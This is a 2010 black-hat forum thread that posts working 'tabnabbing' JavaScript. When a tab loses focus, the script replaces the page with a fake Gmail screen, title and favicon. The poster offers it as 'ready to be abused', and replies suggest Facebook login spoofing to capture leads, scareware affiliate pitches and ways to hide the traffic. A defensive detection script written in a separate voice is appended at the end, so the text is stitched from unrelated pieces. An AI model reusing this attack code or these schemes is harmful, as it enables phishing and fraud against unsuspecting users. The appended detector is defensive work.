
Tab Exploit

Discussion in 'Black Hat SEO' started by HaRRo, May 28, 2010.

  1. HaRRo

    HaRRo Elite Member

    Joined:
    Oct 29, 2005
    Messages:
    2,676
    Likes Received:
    13,447
    Occupation:
    Self Employed
    Location:
    Miami, FL
    Copy this to a whatever.js file

    Code:
    /*
    Blackhatworld.com
    */
    
    
    (function(){
    
    var TIMER = null;
    var HAS_SWITCHED = false;
    
    // Events
    window.onblur = function(){
      TIMER = setTimeout(changeItUp, 5000);
    }  
    
    window.onfocus = function(){
      if(TIMER) clearTimeout(TIMER);
    }
    
    // Utils
    function setTitle(text){ document.title = text; }
    
    // This favicon object rewritten from:
    // Favicon.js - Change favicon dynamically [http://ajaxify.com/run/favicon].
    // Copyright (c) 2008 Michael Mahemoff. Icon updates only work in Firefox and Opera.
    
    favicon = {
      docHead: document.getElementsByTagName("head")[0],
      set: function(url){
        this.addLink(url);
      },
      
      addLink: function(iconURL) {
        var link = document.createElement("link");
        link.type = "image/x-icon";
        link.rel = "shortcut icon";
        link.href = iconURL;
        this.removeLinkIfExists();
        this.docHead.appendChild(link);
      },
    
      removeLinkIfExists: function() {
        var links = this.docHead.getElementsByTagName("link");
        for (var i=0; i<links.length; i++) {
          var link = links[i];
          if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
            this.docHead.removeChild(link);
            return; // Assuming only one match at most.
          }
        }
      },
      
      get: function() {
        var links = this.docHead.getElementsByTagName("link");
        for (var i=0; i<links.length; i++) {
          var link = links[i];
          if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
            return link.href;
          }
        }
      }  
    };  
    
    
    function createShield(){
      div = document.createElement("div");
      div.style.position = "fixed";
      div.style.top = 0;
      div.style.left = 0;
      div.style.backgroundColor = "white";
      div.style.width = "100%";
      div.style.height = "100%";
      div.style.textAlign = "center";
      document.body.style.overflow = "hidden";
      
      img = document.createElement("img");
      img.style.paddingTop = "15px";
      img.src = "http://img.skitch.com/20100524-b639xgwegpdej3cepch2387ene.png";
      
      var oldTitle = document.title;
      var oldFavicon = favicon.get() || "/favicon.ico";
      
      div.appendChild(img);
      document.body.appendChild(div);
      img.onclick = function(){
        div.parentNode.removeChild(div);
        document.body.style.overflow = "auto";
        setTitle(oldTitle);  
        favicon.set(oldFavicon)
      }
      
    
    }
    
    function changeItUp(){
      if( HAS_SWITCHED == false ){
        createShield("https://mail.google.com");
        setTitle( "Gmail: Email from Google");    
        favicon.set("https://mail.google.com/favicon.ico");
        HAS_SWITCHED = true;    
      }
    }
      
      
    })();
    Then include it on a webpage.

    Now load up that page and flick to another Firefox tab for 5 seconds and watch the other tab change. Click to the new tab and look at the new content or phishing page :)

    Ready to be abused enjoy it while it lasts :)


    HERE IS A DEMO for those who don't understand it. Make sure to have multiple tabs open :)
    http://************/test/

    It should also work when minimizing Firefox :)
     
    • Thanks Thanks x 44
  2. HaRRo

    Also I'm not promoting phishing with this, but it can be twisted for other things :)

    Good concept that can make some cash if used correctly :)
     
    • Thanks Thanks x 3
  3. d3t0x

    d3t0x Jr. VIP Jr. VIP Premium Member

    Joined:
    Oct 28, 2008
    Messages:
    1,956
    Likes Received:
    780
    Location:
    Vancouver, BC
    Do you mind giving one example? I am trying to think what else this could be used for. Thanks for the share bro.
     
  4. HaRRo

    You could load a gateway, ads or an email submit form, or scare them and say something like HOW DARE YOU LOAD ANOTHER TAB OR MINIMIZE, then force them a link to an antivirus program, and say WE KNOW YOU DID THIS PREVENT EVERYONE ELSE SEEING HOW YOU BROWSE! Prevent it with Some affiliate link to AV program or firewall program etc... Just one quick idea :)
     
    • Thanks Thanks x 2
  5. HaRRo

    Again I do not want to promote the bad things possible here :)
     
    • Thanks Thanks x 3
  6. d3t0x

    Cool dude, thanks for the ideas
     
  7. onegg

    onegg Junior Member

    Joined:
    Dec 12, 2007
    Messages:
    147
    Likes Received:
    176
    Location:
    In your mind

    mmmm, but I have a couple of ideas in mind, I will twist the code a little :D
    thanks HaRRo

    onegg
     
  8. Mjordan

    Mjordan Power Member

    Joined:
    Jun 30, 2009
    Messages:
    519
    Likes Received:
    96
    Hmm I'm still confused by this. I tried the test page and it just changes to the gmail login page (which is unresponsive to clicks) for a second then back to your test page.
     
  9. chockfactor

    chockfactor Jr. VIP Jr. VIP Premium Member

    Joined:
    Jan 16, 2010
    Messages:
    451
    Likes Received:
    258
    Location:
    In your nightmares
    Hmm harro doesn't this belong in jr.vip?

    Just to keep the lifetime of it a little longer?
     
    Last edited: May 28, 2010
  10. dukefx

    dukefx Jr. VIP Jr. VIP Premium Member

    Joined:
    Mar 8, 2009
    Messages:
    246
    Likes Received:
    109
    Occupation:
    VP Information Technology
    Location:
    Dagobah
    What he is NOT showing is how phishing can be used to steal passwords of Gmail, PayPal, etc. Move along .. this stuff is too illegal.

    Great from a technical perspective - a fellow code-hugger :)
     
  11. Mjordan

    Naw don't worry I don't wanna do any of that, I know I don't wanna get anywhere near that stuff. I used to phish on a smaller scale for stuff that couldn't get me in big trouble so don't speak to me like I don't know anything please.

    I liked his idea of the antivirus aff stuff.
     
  12. tacopalypse

    tacopalypse Executive VIP Jr. VIP Premium Member

    Joined:
    Nov 30, 2009
    Messages:
    980
    Likes Received:
    2,485
    Home Page:
    if you already control the url that the script is on, i don't really see how it would be helpful to sneakily redirect them to another url that you also control. why not just put all the stuff from url 2 onto url 1? why have it redirect at all?

    yea you could scare someone... or redirect them to lemonparty just for fun, but people don't generally part with their money when they think they've arrived at a site via malware infection.

    or maybe i'm just not seeing the big picture here... ?
     
  13. voyevoda

    voyevoda Regular Member Premium Member

    Joined:
    Mar 21, 2010
    Messages:
    217
    Likes Received:
    97
    Location:
    Eastern Front
    An example was posted here a few days ago, so almost everyone knows about it already: http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/

    There is definitely lots of potential for this if you can think out of the box a little.


    Check out the article I just linked above.
     
    • Thanks Thanks x 1
    Last edited: May 28, 2010
  14. tacopalypse

    ah ok, so url 2 has to pose as a familiar website. that makes a lot more sense.

    btw, our feeble minds are a lot more susceptible to this kind of attack than you may realize...

    http://www.youtube.com/watch?v=38XO7ac9eSs

    ;)
     
    • Thanks Thanks x 3
  15. googlemonster

    googlemonster Supreme Member

    Joined:
    Nov 15, 2008
    Messages:
    1,400
    Likes Received:
    525
    I see this on pron sites, how do I prevent it grrr ha
     
  16. MarketerX

    MarketerX Regular Member

    Joined:
    Mar 7, 2010
    Messages:
    398
    Likes Received:
    120
    Hi Harro :) I really like the clickjacking that's been going on Facebook! Keep up the great work man.

    EDIT: Just out of curiosity, are you using this along with your clickjacking facebook apps which cause massive news feed spam which get people to install LoudMo downloads?
     
    Last edited: May 28, 2010
  17. HoNeYBiRD

    HoNeYBiRD Jr. VIP Jr. VIP

    Joined:
    May 1, 2009
    Messages:
    5,913
    Likes Received:
    7,150
    Gender:
    Male
    Occupation:
    Geographer, Tourism Manager
    Location:
    Ghosted
    bad things like this?
    Code:
    http://www.blackhatworld.com/blackhat-seo/blackhat-lounge/203633-tabnabbing-new-type-phishing-attack.html
     
  18. evilman11

    evilman11 Junior Member

    Joined:
    Apr 6, 2009
    Messages:
    149
    Likes Received:
    418
    Occupation:
    chillin at bhw and internet marketing
    Location:
    on the net making my pockets fatter
    heh, yea that's exactly what he had in mind. the possibilities with this exploit are almost endless. for instance, what's one of the most popular websites out right now that has the biggest user base? facebook of course... this exploit could easily be used to iframe email submits using the facebook login page. all you would have to do is copy the facebook landing page and replace the email field with an iframe from your email submit code and the login button with the submit code and just redirect to the actual facebook after they click login (most people don't log out so when they click login they will go to their account). make that come up when someone goes off to another tab so when they go searching through their open tabs they'll be like wtf, i got logged out of facebook? meh i'll just log right back in.

    voila you just earned yourself a commission for that lead. of course you would definitely have to hide your traffic and wash it down with halfway decent junk traffic to the actual submit. i'm not going into exact details on how to do that. it's just a possibility that this could be used for. of course, i don't recommend doing anything like this unless you know what you're doing cause you will get shit canned from your network pretty quick if not done properly.
     
  19. RedSEO

    RedSEO Newbie

    Joined:
    May 13, 2010
    Messages:
    16
    Likes Received:
    1
    intellectual exercise:

    it can be used for lots of stuff. say it's been inactive 1h+, that means someone has totally forgotten what was there. using the technique proposed in the original thread an immoral turd would know which one of the 20 largest news sites the user uses. download today's frontpage, cache it for the day after switching a piece of main content to his awesome endorsement of grownup diapers with a big buy link.

    BAM! Everyone wears diapers the next day!

    Or you could spawn multiple windows with his fave porn site, and propose a solution for all the evil spawning of a porn site he trust(ed).
     
    Last edited: May 29, 2010
  20. GreyWolf

    GreyWolf Executive VIP Jr. VIP

    Joined:
    Aug 17, 2009
    Messages:
    1,930
    Likes Received:
    5,389
    Gender:
    Male
    Occupation:
    Artist / Craftsman
    Location:
    sitting at my PC
    yeah I saw an article about this just the other day. If it's the one I'm thinking of, the power is in the fact that the user opens your page and it looks normal. Only after they switch to a different tab does it change your tab to a different page. It also spoofs the tab title and favicon so that when they come back to your tab they might think the tab with their email account was left open and just timed out. They'll see the tab title looks ok, so they might just enter their login info without noticing the url in the address bar is wrong.

    The biggest use is obviously for phishers, and it will be corrected regardless of it being posted here. It's not going to last, but until then there might be other ways to use it other than phishing. Maybe a way to push a cpa or something. It only works for Firefox and a few similar type browsers. I think the article said in IE it will only change the page displayed in the tab, but won't change the tab title or favicon.

    It's a pretty cool idea, surely there must be a way of using it for something cool instead of just phishing sites. Like I said though it's already been reported, so certainly Firefox will be making a fix for it soon.
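
The behaviour described in the post above (the page looks normal until the tab loses focus, then its title, favicon and visible content are swapped) can be detected from inside the browser. The following is an added example, not code from the thread or from any project it mentions: it snapshots a tab's identity cues on blur and compares them on focus. The function names `snapshotTab`, `diffSnapshots` and `watchTab` are hypothetical, and the script is assumed to run as a browser-extension content script or userscript.

```javascript
// Added defensive example, not code from the thread. All names are hypothetical.
// Assumed to run as a browser-extension content script or userscript.

// Record the identity cues a tab shows: title, favicon links, and any
// full-viewport fixed-position element appended directly to <body>.
function snapshotTab(doc) {
  const icons = Array.from(doc.getElementsByTagName("link"))
    .filter((l) => (l.rel || "").toLowerCase().split(/\s+/).includes("icon"))
    .map((l) => l.href)
    .sort();
  const overlays = Array.from(doc.body.children).filter((el) => {
    const s = el.style || {};
    return s.position === "fixed" && s.width === "100%" && s.height === "100%";
  }).length;
  return { title: doc.title, icons, overlays };
}

// Compare the snapshot taken on blur with the one taken on focus.
function diffSnapshots(before, after) {
  const changes = [];
  if (before.title !== after.title) changes.push("title");
  if (before.icons.join("\n") !== after.icons.join("\n")) changes.push("favicon");
  if (after.overlays > before.overlays) changes.push("overlay");
  return changes;
}

// Snapshot when the window loses focus, re-check when it regains it.
function watchTab(win, doc, onAlert) {
  let saved = null;
  win.addEventListener("blur", () => { saved = snapshotTab(doc); });
  win.addEventListener("focus", () => {
    if (!saved) return;
    const changes = diffSnapshots(saved, snapshotTab(doc));
    saved = null;
    // A title change alone is common (unread counters). A new covering
    // overlay, or title and favicon changing together, is the swap pattern.
    if (changes.includes("overlay") || changes.length >= 2) onAlert(changes);
  });
}

if (typeof window !== "undefined") {
  watchTab(window, document, (c) =>
    console.warn("Tab identity changed while unfocused:", c.join(", ")));
}
```

The overlay check only sees inline styles; an overlay positioned through a stylesheet would need `getComputedStyle` instead. Whatever the heuristic reports, the address bar remains the authoritative check, since a script can change the title and favicon but not the displayed URL.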